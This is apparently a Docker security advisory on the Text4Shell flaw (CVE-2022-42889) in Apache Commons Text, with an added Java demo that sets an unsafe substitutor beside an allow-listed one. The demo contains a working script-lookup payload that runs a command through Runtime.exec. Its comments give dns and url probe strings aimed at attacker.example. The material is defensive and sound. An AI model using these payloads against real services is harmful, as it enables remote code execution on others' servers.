CVE-2022-42889, aka “Text4Shell”, is a vulnerability in the popular Java library “Apache Commons Text” which can result in arbitrary code execution when processing malicious input. The library's StringSubstitutor interpolation feature (introduced in 1.5) ships with the “script”, “dns” and “url” lookups enabled by default in versions 1.5 through 1.9. When untrusted input reaches the substitutor, these three lookups are evaluated on the server: the script prefix executes an embedded script, and the dns and url prefixes make the server connect to an arbitrary host, so an attacker can run code or pull content from an external source. Version 1.10.0 disables these three lookups by default.
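The pattern described above, shown as an added example that is not from the original post or from the Apache Commons Text project: a substitutor built with the default interpolator resolves the script/dns/url prefixes, while one built with an explicit allow-list of lookups and addDefaultLookups=false leaves them unresolved. The payload string, the lookup names in the allow-list and the /tmp/text4shell marker file are constructed for the demo; the script lookup only runs when a JSR-223 JavaScript engine (Nashorn on JDK 8 to 14) is on the classpath.

```java
import java.util.Map;
import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookup;
import org.apache.commons.text.lookup.StringLookupFactory;

/*
 * Added example, not the project's own code. Needs commons-text on the
 * classpath; the unsafe behaviour is observable on 1.5 through 1.9 only.
 */
public class Text4ShellDemo {

    // Constructed attacker input. With the default lookups enabled the
    // "script" prefix hands the rest of the variable to a scripting engine.
    // Equivalent probes for the other two prefixes look like
    // "${dns:address|attacker.example}" and "${url:UTF-8:http://attacker.example/}".
    static final String PAYLOAD =
        "${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/text4shell')}";

    // VULNERABLE on 1.5-1.9: the default interpolator exposes every built-in
    // lookup, including script/dns/url, to whatever template the caller passes.
    static String renderUnsafe(String template) {
        StringSubstitutor sub =
            new StringSubstitutor(StringLookupFactory.INSTANCE.interpolatorStringLookup());
        return sub.replace(template);
    }

    // HARDENED: only the lookups named in this map are resolvable. With a null
    // default lookup and addDefaultLookups=false, "script:", "dns:" and "url:"
    // are unknown prefixes and the variable is left in the output untouched,
    // regardless of which library version is installed.
    static String renderSafe(String template) {
        Map<String, StringLookup> allowed = Map.of(
            "env", StringLookupFactory.INSTANCE.environmentVariableStringLookup(),
            "sys", StringLookupFactory.INSTANCE.systemPropertyStringLookup());
        StringLookup lookup =
            StringLookupFactory.INSTANCE.interpolatorStringLookup(allowed, null, false);
        return new StringSubstitutor(lookup).replace(template);
    }

    public static void main(String[] args) {
        // The hardened substitutor echoes the payload back verbatim.
        System.out.println("safe:   " + renderSafe(PAYLOAD));
        // Run this one only inside a throwaway container on commons-text 1.5-1.9
        // to see /tmp/text4shell appear; on 1.10.0+ it also comes back verbatim.
        System.out.println("unsafe: " + renderUnsafe(PAYLOAD));
    }
}
```

The allow-list approach is the mitigation to apply when the substitutor must keep processing data that an external party can influence; upgrading to 1.10.0 removes the three lookups from the defaults but does not change the fact that any enabled lookup runs with the server's privileges.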

Docker vulnerability scanning tools, including the docker scan CLI and Docker Hub vulnerability scanning (https://docs.docker.com/docker-hub/vulnerability-scanning/), both powered by Snyk, detect the presence of the vulnerable versions of the library and flag your image as vulnerable.

As of 12:00 UTC on 21 October 2022, Docker Hub identifies the Text4Shell vulnerability and badges any image it finds to be vulnerable.

A number of the Docker Official Images do contain the vulnerable versions (1.5 through 1.9) of Apache Commons Text, so check the scan results for the images you build on and rebuild once an updated base image is available.
